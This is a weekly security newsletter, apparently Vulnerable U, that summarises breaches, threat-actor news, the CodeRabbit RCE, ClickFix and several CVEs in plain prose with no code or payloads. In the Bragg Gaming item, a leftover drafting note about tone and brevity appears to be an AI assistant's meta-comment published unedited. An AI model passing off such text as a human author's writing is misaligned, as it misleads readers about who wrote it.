Read Time: 5 minutes

Brought to you by:

Howdy friends!

Hey guys, good week here in Texas, back to the routine post-Vegas black hole. Feels good to be back in the gym. Feels good to get a bunch of stuff done with a cup filled after seeing the great energy of the community at those couple conferences.

No sponsor in this week's newsletter, brought to you by myself! And the launch of VulnU premium. Thank you to the couple handfull of you that have signed up so far, even without any premium content on the other side of that paywall. But now that's no longer true!

We sent out the first edition of VulnU Premium this week. Huge thanks to my good friend RSnake for doing the first inaugural interview. It's really a great one, it's a home run, couldn't have asked for a better first interview.

Here I recorded a quick video that I'm going to record for every edition of VulnU Premium as an intro to what we're doing over here. I'm not going to include these in the free version of the newsletter moving forward, but I wanted you guys to hear it in my own words what I'm working on behind the scenes.

Sneak Peak at VulnU Premium this Week a snippet from an interview where we get into some serious life and mental challenges in some very successful infosec leaders lives. You’re not alone whatever you’re going through:

ICYMI

🖊️ Something I wrote: Famous indie hacker, levelsio, put out a decent list of securing your environment for vibe coders and the like. I wanted to crowdsource some extra advice in this thread.

🎧️ Something I heard: This video about claude code workflow is being passed around by a lot of people I trust who are saying if you listen to it, its game changing for you. (This isn’t just about coding)

🎤 Something I said: Did this awesome interview with one of the heads of Microsoft Threat Intel, Sherrod DeGrippo

🔖 Something I read: I'm Worried It Might Get Really Bad - My good homie Daniel Miessler laying out some seriously worrying thoughts about the state of things and the future.

Vulnerable News

Researcher Exposes Zero-Day Clickjacking Vulnerabilities in Major Password Managers

Fun one. Fun conversation it brings up about if clickjacking is worth fixing for the usability hit. I’m not losing sleep over it but worth talking about:

Why Video Game Anti-Cheat Systems Are a Cybersecurity Goldmine

Turns out video game anti-cheat systems are basically cybersecurity boot camp on steroids. Researchers from University of Birmingham dropped some interesting findings at Black Hat about how gaming companies are dealing with cheaters, and honestly, they're moving way faster than traditional cybersecurity. Anti-cheat updates that get countered within hours, versus the glacial pace of malware/antivirus cycles. These gaming defenders are spotting vulnerable drivers used in ransomware attacks a full year before mainstream security catches on.

The economics are wild too - even the best anti-cheat systems only block cheating about 50% of the time, but they're pricing people out with $200 monthly subscriptions for premium cheats. There's a whole underground economy here, from casual $100 aimbots to subtle competitive advantages for esports match-fixing. The researchers make a compelling case that cybersecurity folks should be studying this space more closely, especially since cheat development can actually be more profitable than legitimate bug bounties. Who knew Mario Kart could teach us about threat hunting? (read more)

Interesting thread on this topic. I like LowLevels take here, he even summoned notch

Workday Breach Likely Linked to ShinyHunters Salesforce Attacks

Workday just got social engineered by what looks like the ShinyHunters crew, who've been on a tear hitting companies through their Salesforce instances. The attackers called up Workday employees pretending to be from HR, convinced someone to hand over access, and managed to swipe business contact info from their third-party CRM system. No customer data got touched, just the usual names, emails, and phone numbers that'll probably fuel their next round of social engineering campaigns. (read more)

ShinyHunters and Scattered Spider: A Merger of Chaos in the 2025 Salesforce Attacks

Way more interesting than the actual Workday/Salesforce breach is this MO shift of Shiny Hunters, and they're looking a lot more like Scattered Spider. Their Telegram groups are getting popped and shutting down. Super interesting merger of threat actors. I wonder if it has anything to do with some of them getting arrested.

Obsidian researchers are tracking what appears to be ShinyHunters and Scattered Spider joining forces, evidenced by a massive wave of Salesforce attacks that hit Google, Qantas, LVMH, and dozens of other companies. The attack was straight out of Scattered Spider’s latest playbook - voice phishing calls pretending to be IT support, tricking employees into authorizing malicious OAuth apps that then hoovered up CRM data via Salesforce APIs.

The attribution got messy when ShinyHunters' alleged leader straight-up told DataBreaches.net they were working with Scattered Spider, despite security firms tracking them as separate groups (UNC6040, UNC6240, UNC3944). Adding to the chaos, Telegram channels started popping up conflating ShinyHunters, Scattered Spider, and even Lapsus$ into one big happy criminal family. The channels have been a wild ride of exploit sharing, data leak teasers, and threats against security companies before getting nuked and reappearing under new names. Bottom line: these groups are evolving and potentially consolidating, making attribution harder but the threat very real.(read more)

Scattered Spider affiliate given 10 year sentence, ordered to pay $13 million in restitution

Speaking of them going to jail…

A 20-year-old Scattered Spider member just got hit harder than expected in court. Noah Michael Urban was looking at eight years but the judge said "nope" and gave him 10, plus $13 million in restitution to over 30 victims. FBI seized nearly $3 million in crypto from his computer when they raided his place last year, and he admitted the whole stash came from his Scattered Spider work.

Urban and his crew were doing the classic SIM swap and SMS phishing routine to steal crypto and corporate docs between 2022-2023. These are the same folks behind the MGM Casino ransomware hit in 2023. If you follow me you know this, but if you’re new here they laid low for a bit, and came back swinging this year, going after airlines, insurance companies, and major retailers from March to present day. (read more)

How We Exploited CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories

Here's a fun one from Kudelski Security on how they completely owned CodeRabbit, that popular AI code review tool. Turns out CodeRabbit runs external linters like Rubocop on your PR changes, and Rubocop has this neat feature where you can tell it to load arbitrary Ruby extensions. (What years is it?!)

So they crafted a malicious PR with a .rubocop.yml config that loaded their own ext.rb file, which promptly exfiltrated all the environment variables from CodeRabbit's production servers when it ran.

The haul was absolutely bonkers - Anthropic API keys, OpenAI keys, database credentials, and most importantly, CodeRabbit's GitHub App private key. That private key essentially gave them read/write access to the 1 million repositories using CodeRabbit, including private repos. They could've cloned private code, modified git history, or replaced releases with malware for a massive supply chain attack. (read more)

Congressman proposes bringing back letters of marque for cyber privateers

Arizona Congressman David Schweikert wants to bring back an old-school tactic for modern problems - letters of marque for cyber privateers. His "Scam Farms Marque and Reprisal Authorization Act" would let the President commission white hat hackers to go after foreign cybercriminals and seize their assets. We're talking about the same legal framework that created privateers back in the War of 1812, except now they'd be hunting scammers instead of British ships.

The bill gives pretty broad authority - no limits on how many cyber privateers could be commissioned, and they'd be authorized to target anyone from criminal enterprises to foreign governments involved in cyber attacks. Schweikert's pointing to the $16.6 billion Americans lost to scams last year as proof that current approaches aren't cutting it. His team also frames this as a human rights issue, noting how people in places like Myanmar and China are being trafficked and forced into scammer roles. Whether Congress will actually greenlight government-sanctioned hacker crews remains to be seen, but it's certainly a creative approach to the cybercrime problem. (read more)

Think before you Click(Fix): Analyzing the ClickFix social engineering technique

Every blue teamer I know is currently facing a click fix incident. This is a great post out of Microsoft analyzing the whole thing. This is a wild wave that this technique is everywhere right now.

Thanks Microsoft's threat intel for the comprehensive breakdown of the "ClickFix" social engineering technique. This attack tricks users into running malicious commands by presenting fake error messages, CAPTCHA checks, or verification prompts that look legit. It tells users to "fix" the issue by copying and pasting commands into Windows Run dialog, Terminal, or PowerShell. Behind the scenes, it's delivering nasty payloads like Lumma Stealer, various RATs, and even rootkits to thousands of devices daily.

The technique arrives via phishing emails, malvertising, and compromised sites, often impersonating trusted brands like Cloudflare, Google, or even government agencies like the SSA. Microsoft's seeing ClickFix builders selling on forums for anywhere from $200 to $1500 per month, complete with anti-detection guarantees. The attack has even expanded to macOS users with campaigns delivering Atomic macOS Stealer.

This is a good one to share to people who need to defend themselves from this attack. (read more)

Critical SAP Vulns Under Exploitation in 'One-Two Punch' Attack

SAP is everywhere so these headlines are attention grabbing for me. Someone dropped an exploit on Telegram that chains together two critical flaws in SAP NetWeaver Visual Composer (CVE-2025-31324 and CVE-2025-42999) for what researchers are calling a "one-two punch" attack. The first vulnerability bypasses authentication to get malicious payloads onto the server, then the second one deserializes and executes the code with SAP system privileges.

The exploit supposedly came from channels linked to Scattered Spider, ShinyHunters, and LAPSUS$, and VX-Underground shared it publicly last week. If you're running unpatched SAP systems, this combo can lead to complete system takeover and remote code execution. The good news is patches have been available for a while - if you've applied SAP Security Notes 3594142 and 3604119, you're good to go. But if not, might want to get on that before someone decides to test this "devastating" attack chain on your infrastructure. (read more)

Orange Belgium mega-breach exposes 850K customers to serious fraud

Orange Belgium just had 850,000 customers' data swiped in a breach that happened back in July. Full names, phone numbers, SIM card numbers, and PUK codes - basically everything you'd need to run convincing targeted phishing campaigns. Orange is downplaying this, claiming "no critical data was compromised" since passwords and financial info stayed safe, but security experts are calling BS on that assessment.

The real concern here is how this data combo creates a perfect storm for fraud. Having real names tied to phone numbers makes phishing attempts way more believable, and there's serious worry about high-risk individuals like domestic violence victims or politicians who might now need to change their numbers entirely. Orange insists there's no SIM-swapping risk and they've beefed up their security checks. What do you think on this one and this kind of breach? (read more)

Device searches at the US border hit record high, new data shows

Short but figured it was important to point out: “The data shows that U.S. Customs and Border Protection, the agency tasked with immigration screening at the U.S. border, searched 14,899 devices of international travelers between April through June, a 17% rise on the previous record high recorded in early 2022.” (read more)

Apple fixes new zero-day flaw exploited in targeted attacks

TLDR: Hit update on every single Apple device. This one they're saying is actively exploited and patched in the most recent wave of updates.

Emergency patches for CVE-2025-43300 is an out-of-bounds write bug in the Image I/O framework - basically, attackers can craft malicious images that corrupt memory and potentially execute code. Apple's calling the attacks "extremely sophisticated" and targeted at specific individuals, which usually means state-sponsored shenanigans rather than mass exploitation. (read more)

“Rapper Bot” malware seized, alleged developer identified and charged

A 22-year-old from Oregon got nabbed for running "Rapper Bot," a Mirai-based DDoS-for-hire service that was just taken down in Operation PowerOff. The botnet infected 45,000+ DVRs and routers across 39 countries, launching a whopping 370,000 attacks since April 2025. We're talking serious firepower here - 2 to 6 Tbps attacks that could cost victims up to $10k for just 30 seconds of downtime.

Ethan Foltz allegedly rented out this beast to target everything from government systems to gaming companies, and even added cryptomining to squeeze more profit from compromised devices. AWS helped trace the C2 infrastructure, leading to the August 6 raid. While Foltz is looking at up to 10 years if convicted, he's currently walking free on a summons. The botnet's been quiet since the takedown, suggesting this might actually be the end of Rapper Bot's tour. (read more)

Gambling Tech Firm Bragg Discloses Cyberattack

Bragg Gaming Group got hit with a breach over the weekend - they're saying hackers got into their internal systems but operations weren't affected. Pretty light on details at this point, which usually means they're still figuring out what happened. Given they provide gaming tech to casinos and betting platforms, this is one to watch - especially since gambling companies have been prime targets lately for their combo of financial data and infrastructure.

Note: I kept this brief since the source material was limited, but connected it to the broader context of gaming/gambling companies being targeted. The tone aims to be straightforward while providing relevant industry context that a security professional would want to know. (read more)

Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme

Another crypto bro bites the dust - Charles Parks III (aka "CP3O") just got sentenced to a year in prison for running a $3.5M cryptojacking operation using stolen cloud computing resources. Parks created shell companies like "MultiMillionaire LLC" (subtle, right?) to scam cloud providers in Seattle and Redmond (looking at you AWS and Azure) into providing massive computing power for mining Monero, ETH, and Litecoin.

The best part? While racking up millions in unpaid cloud bills, he told providers he was building "a global online training company" for 10,000 students. Classic. He managed to mine about $1M worth of crypto before getting caught, laundering it through NFT marketplaces and crypto exchanges to buy a Mercedes AMG and other luxuries. The cherry on top was his YouTube channel where he gave tips on achieving a "MultiMillionaire Mentality" - turns out step 1 was fraud. The US Attorney summed it up perfectly: he branded himself as an innovator but was "merely a fraudster whose secret to getting rich quick was lying and stealing." (read more)

Miscellaneous mattjay

Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay